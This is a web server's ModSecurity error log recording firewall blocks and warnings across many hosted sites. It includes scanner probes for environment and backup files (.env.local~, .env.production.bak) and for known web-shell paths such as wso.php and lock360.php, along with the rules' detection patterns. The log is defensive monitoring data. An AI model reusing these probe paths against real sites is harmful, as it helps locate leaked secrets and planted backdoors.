[Tue May 26 15:27:17.631837 2026] [security2:error] [pid 715645:tid 715823] [client 207.241.173.79:64570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.local~"] [unique_id "ahVufXVGgMGh8k213RjuowAAADA"]
[Tue May 26 15:27:17.638077 2026] [security2:error] [pid 715645:tid 715808] [client 207.241.173.79:64590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.local.orig"] [unique_id "ahVufXVGgMGh8k213RjupQAAACE"]
[Tue May 26 15:27:17.639942 2026] [security2:error] [pid 715645:tid 715878] [client 207.241.173.79:64618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.production.bak"] [unique_id "ahVufXVGgMGh8k213RjupgAAAGc"]
[Tue May 26 15:27:18.853315 2026] [security2:error] [pid 715645:tid 715863] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVufnVGgMGh8k213RjuuwAAAFg"]
[Tue May 26 15:27:21.162205 2026] [security2:error] [pid 715645:tid 715891] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVugHVGgMGh8k213RjvBgAAAHQ"]
[Tue May 26 15:27:23.482346 2026] [security2:error] [pid 715645:tid 715878] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVug3VGgMGh8k213RjvVwAAAGc"]
[Tue May 26 15:27:23.798152 2026] [security2:error] [pid 715645:tid 715836] [client 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVug3VGgMGh8k213RjvcAAAAD0"], referer: www.google.com
[Tue May 26 15:27:23.805205 2026] [security2:error] [pid 715645:tid 715809] [client 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVug3VGgMGh8k213RjvcQAAACI"]
[Tue May 26 15:27:23.823176 2026] [security2:error] [pid 715645:tid 715867] [client 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVug3VGgMGh8k213RjvbwAAAFw"], referer: www.google.com
[Tue May 26 15:27:23.859860 2026] [security2:error] [pid 715645:tid 715803] [client 74.7.230.60:43938] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.mmajaypackersmovers.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVug3VGgMGh8k213RjvdgAAHDI"]
[Tue May 26 15:27:24.148944 2026] [security2:error] [pid 715645:tid 715846] [client 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/tksladep.php"] [unique_id "ahVuhHVGgMGh8k213RjvgAAAAEc"], referer: www.google.com
[Tue May 26 15:27:24.327790 2026] [security2:error] [pid 715645:tid 715699] [remote 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVuhHVGgMGh8k213RjvjAAAAzU"], referer: www.google.com
[Tue May 26 15:27:24.699682 2026] [security2:error] [pid 715645:tid 715710] [remote 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVuhHVGgMGh8k213RjvnQAATUA"], referer: www.google.com
[Tue May 26 15:27:25.074557 2026] [security2:error] [pid 715645:tid 715805] [client 74.7.175.191:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVuhHVGgMGh8k213RjvlQAAAB4"]
[Tue May 26 15:27:25.074662 2026] [security2:error] [pid 715645:tid 715805] [client 74.7.175.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVuhHVGgMGh8k213RjvlQAAAB4"]
[Tue May 26 15:27:25.075458 2026] [security2:error] [pid 715645:tid 715851] [client 74.7.175.191:36796] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahVuhHVGgMGh8k213RjvkwAATEE"]
[Tue May 26 15:27:25.159065 2026] [security2:error] [pid 715645:tid 715880] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuhHVGgMGh8k213RjvoAAAAGk"]
[Tue May 26 15:27:25.183116 2026] [security2:error] [pid 715645:tid 715709] [remote 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/intghjoo.php"] [unique_id "ahVuhXVGgMGh8k213RjvsQAAQT8"], referer: www.google.com
[Tue May 26 15:27:25.406256 2026] [security2:error] [pid 715645:tid 715861] [client 74.7.175.191:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVuhXVGgMGh8k213RjvtAAAAFY"], referer: https://srsglobalsoft.com/robots.txt
[Tue May 26 15:27:25.407113 2026] [security2:error] [pid 715645:tid 715799] [client 74.7.175.191:36808] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahVuhXVGgMGh8k213RjvsgAAGD4"], referer: https://srsglobalsoft.com/robots.txt
[Tue May 26 15:27:25.516738 2026] [security2:error] [pid 715645:tid 715740] [remote 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVuhXVGgMGh8k213RjvxQAAd14"]
[Tue May 26 15:27:25.520457 2026] [security2:error] [pid 715645:tid 715827] [client 74.7.230.23:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVuhXVGgMGh8k213RjvvgAAADQ"]
[Tue May 26 15:27:25.521361 2026] [security2:error] [pid 715645:tid 715881] [client 74.7.230.23:41232] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahVuhXVGgMGh8k213RjvuQAAajk"]
[Tue May 26 15:27:25.675116 2026] [security2:error] [pid 715645:tid 715712] [remote 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVuhXVGgMGh8k213RjvyAAASkI"]
[Tue May 26 15:27:25.837664 2026] [security2:error] [pid 715645:tid 715713] [remote 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVuhXVGgMGh8k213RjvzwAAWEM"]
[Tue May 26 15:27:25.886691 2026] [security2:error] [pid 715645:tid 715838] [client 74.7.230.23:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVuhXVGgMGh8k213RjvzgAAAD8"]
[Tue May 26 15:27:25.891367 2026] [security2:error] [pid 715645:tid 715852] [client 74.7.230.23:45368] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahVuhXVGgMGh8k213RjvzAAAAE0"]
[Tue May 26 15:27:25.998606 2026] [security2:error] [pid 715645:tid 715741] [remote 45.92.1.83:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVuhXVGgMGh8k213Rjv0gAARV8"]
[Tue May 26 15:27:27.388579 2026] [security2:error] [pid 715645:tid 715813] [client 45.92.1.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVuhHVGgMGh8k213RjvhgAAJjg"], referer: www.google.com
[Tue May 26 15:27:27.545553 2026] [security2:error] [pid 715645:tid 715824] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuh3VGgMGh8k213Rjv6AAAADE"]
[Tue May 26 15:27:28.285226 2026] [security2:error] [pid 715645:tid 715886] [client 189.172.187.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuh3VGgMGh8k213Rjv-QAAAG8"]
[Tue May 26 15:27:28.327289 2026] [security2:error] [pid 715645:tid 715720] [remote 45.92.1.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVuiHVGgMGh8k213RjwBgAAK0o"], referer: www.google.com
[Tue May 26 15:27:29.829256 2026] [security2:error] [pid 715645:tid 715840] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuiXVGgMGh8k213RjwKAAAAEE"]
[Tue May 26 15:27:32.930645 2026] [security2:error] [pid 715645:tid 715844] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVujHVGgMGh8k213RjwcgAAAEU"]
[Tue May 26 15:27:34.664200 2026] [security2:error] [pid 715645:tid 715894] [client 66.249.70.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVujnVGgMGh8k213RjwrgAAAHc"]
[Tue May 26 15:27:35.002473 2026] [security2:error] [pid 715645:tid 715889] [client 66.249.64.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVujnVGgMGh8k213RjwtwAAAHI"]
[Tue May 26 15:27:35.135128 2026] [security2:error] [pid 715645:tid 715845] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVujnVGgMGh8k213RjwsQAAAEY"]
[Tue May 26 15:27:37.213619 2026] [security2:error] [pid 715645:tid 715816] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVukHVGgMGh8k213Rjw4AAAACk"]
[Tue May 26 15:27:37.523890 2026] [security2:error] [pid 715645:tid 715821] [client 77.68.9.24:58086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/images/images/cache.php"] [unique_id "ahVukXVGgMGh8k213Rjw8QAAAC4"], referer: www.google.com
[Tue May 26 15:27:37.996750 2026] [security2:error] [pid 715645:tid 715841] [client 185.192.71.166:23173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/bless.php"] [unique_id "ahVukXVGgMGh8k213Rjw-AAAAEI"]
[Tue May 26 15:27:38.467994 2026] [security2:error] [pid 715645:tid 715888] [client 185.192.71.176:57091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 176.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/O-Simple.php"] [unique_id "ahVuknVGgMGh8k213RjxCAAAAHE"]
[Tue May 26 15:27:38.571089 2026] [security2:error] [pid 715645:tid 715868] [client 147.92.52.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVuknVGgMGh8k213RjxCwAAAF0"], referer: https://www.anujtradingco.com/
[Tue May 26 15:27:39.301468 2026] [security2:error] [pid 715645:tid 715856] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuknVGgMGh8k213RjxGgAAAFE"]
[Tue May 26 15:27:39.431235 2026] [security2:error] [pid 715645:tid 715842] [client 185.92.25.60:51259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/lock360.php"] [unique_id "ahVuk3VGgMGh8k213RjxJQAAAEM"]
[Tue May 26 15:27:40.533406 2026] [security2:error] [pid 715645:tid 715876] [client 91.230.225.123:52891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 123.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/zwso.php"] [unique_id "ahVulHVGgMGh8k213RjxQwAAAGU"]
[Tue May 26 15:27:41.079796 2026] [security2:error] [pid 715645:tid 715881] [client 147.92.52.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVulXVGgMGh8k213RjxUwAAAGo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1261506&moderation-hash=286a02e66440642b1d772ca05403d18a
[Tue May 26 15:27:41.420844 2026] [security2:error] [pid 715645:tid 715791] [client 91.230.225.120:35707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/chosen.php"] [unique_id "ahVulXVGgMGh8k213RjxXQAAABA"]
[Tue May 26 15:27:41.618003 2026] [security2:error] [pid 715645:tid 715796] [client 152.232.13.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVulXVGgMGh8k213RjxZgAAABU"], referer: https://www.anujtradingco.com/
[Tue May 26 15:27:42.110237 2026] [security2:error] [pid 715645:tid 715814] [client 185.92.25.52:25977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 52.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/about.php"] [unique_id "ahVulnVGgMGh8k213RjxdgAAACc"]
[Tue May 26 15:27:42.157696 2026] [security2:error] [pid 715645:tid 715860] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVulXVGgMGh8k213RjxbwAAAFU"]
[Tue May 26 15:27:42.534718 2026] [security2:error] [pid 715645:tid 715875] [client 185.192.71.178:47829] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/admin.php"] [unique_id "ahVulnVGgMGh8k213RjxgwAAAGQ"]
[Tue May 26 15:27:42.637840 2026] [security2:error] [pid 715645:tid 715793] [client 74.249.173.207:5380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/wk/index.php"] [unique_id "ahVulnVGgMGh8k213RjxhwAAABI"]
[Tue May 26 15:27:43.102211 2026] [security2:error] [pid 715645:tid 715815] [client 185.92.25.130:38085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/mah.php"] [unique_id "ahVul3VGgMGh8k213RjxlwAAACg"]
[Tue May 26 15:27:43.377038 2026] [security2:error] [pid 715645:tid 715847] [client 152.232.13.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVul3VGgMGh8k213RjxoAAAAEg"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1429934&moderation-hash=d5f6669a8e063df5ec07d128d30da23b
[Tue May 26 15:27:43.762665 2026] [security2:error] [pid 715645:tid 715868] [client 77.68.9.24:62559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/images/images/cache.php"] [unique_id "ahVul3VGgMGh8k213RjxrgAAAF0"], referer: www.google.com
[Tue May 26 15:27:43.780188 2026] [security2:error] [pid 715645:tid 715852] [client 185.92.25.58:55103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/.wp/wso.php"] [unique_id "ahVul3VGgMGh8k213RjxrQAAAE0"]
[Tue May 26 15:27:44.250336 2026] [security2:error] [pid 715645:tid 715784] [client 147.92.52.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVumHVGgMGh8k213RjxwwAAAAk"], referer: https://anujtradingco.com
[Tue May 26 15:27:44.549196 2026] [security2:error] [pid 715645:tid 715893] [client 185.92.25.130:34541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/core.php"] [unique_id "ahVumHVGgMGh8k213RjxywAAAHY"]
[Tue May 26 15:27:44.729776 2026] [security2:error] [pid 715645:tid 715895] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVumHVGgMGh8k213RjxyQAAAHg"]
[Tue May 26 15:27:45.503461 2026] [security2:error] [pid 715645:tid 715878] [client 85.208.96.210:28016] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVumXVGgMGh8k213Rjx6gAAAGc"]
[Tue May 26 15:27:45.503559 2026] [security2:error] [pid 715645:tid 715878] [client 85.208.96.210:28016] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVumXVGgMGh8k213Rjx6gAAAGc"]
[Tue May 26 15:27:46.092073 2026] [security2:error] [pid 715645:tid 715873] [client 91.230.225.130:59921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/robots.php"] [unique_id "ahVumXVGgMGh8k213Rjx-gAAAGI"]
[Tue May 26 15:27:46.332770 2026] [security2:error] [pid 715645:tid 715875] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVumXVGgMGh8k213Rjx-QAAAGQ"]
